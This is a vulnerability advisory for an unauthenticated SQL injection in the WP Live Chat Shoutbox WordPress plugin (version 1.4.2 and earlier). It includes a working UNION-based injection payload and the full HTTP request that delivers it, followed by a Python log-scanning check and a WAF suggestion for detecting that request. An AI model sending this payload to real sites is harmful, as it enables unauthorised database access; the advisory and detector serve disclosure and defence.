wpexploit
Simone Onofri, Donato Onofri
WPEX-ID:4E5AA9A3-65A0-47D6-BC26-A2FB6CB073FF
History: Apr 03, 2023 - 12:00 a.m.

Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi


EPSS: 0.053 (Low)
Percentile: 93.1%

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Submit a message in the chatbox and intercept the request, for example with Burp Suite.

Edit the request body to match the following: action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default

Send the request. It will succeed, and the response also lists previous messages.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close

action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
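
A detection-side check for the request above, added here as an example and not taken from the advisory or the plugin's code: it parses logged admin-ajax.php POST bodies and flags `shoutbox-ajax-update-messages` requests whose `last_timestamp` is not a plain integer. The function names, the rule that a legitimate `last_timestamp` is a non-negative decimal integer, and the benign sample are assumptions; the second sample body is the one shown in the request above.

```python
import re
from urllib.parse import parse_qs

# Action name as it appears in the advisory's request.
TARGET_ACTION = "shoutbox-ajax-update-messages"
# Assumption: a legitimate last_timestamp is a non-negative decimal integer.
# [0-9] plus fullmatch() rejects Unicode digits and trailing newlines.
INT_RE = re.compile(r"[0-9]{1,20}")


def check_body(body: str) -> list:
    """Return findings for one urlencoded admin-ajax.php POST body."""
    # keep_blank_values so an empty last_timestamp is inspected, not dropped
    params = parse_qs(body, keep_blank_values=True)
    if TARGET_ACTION not in params.get("action", []):
        return []  # other AJAX actions are out of scope for this check
    findings = []
    values = params.get("last_timestamp", [])
    if len(values) > 1:
        findings.append(f"last_timestamp supplied {len(values)} times")
    for value in values:
        if not INT_RE.fullmatch(value):
            findings.append(f"non-integer last_timestamp: {value[:80]!r}")
    return findings


def scan(requests) -> list:
    """Return (index, findings) for admin-ajax.php POSTs that trip the check."""
    hits = []
    for i, (path, body) in enumerate(requests):
        if path.split("?", 1)[0].endswith("/wp-admin/admin-ajax.php"):
            findings = check_body(body)
            if findings:
                hits.append((i, findings))
    return hits


# Constructed sample log: (request path, POST body)
SAMPLES = [
    ("/wp-admin/admin-ajax.php",
     "action=shoutbox-ajax-update-messages&last_timestamp=1680480000&rooms%5B%5D=default"),
    ("/wp-admin/admin-ajax.php",
     "action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,"
     "(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default"),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLES):
        print(index, findings)
```

The same integer-only rule can be enforced at a WAF or reverse proxy in front of admin-ajax.php while the plugin remains installed.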
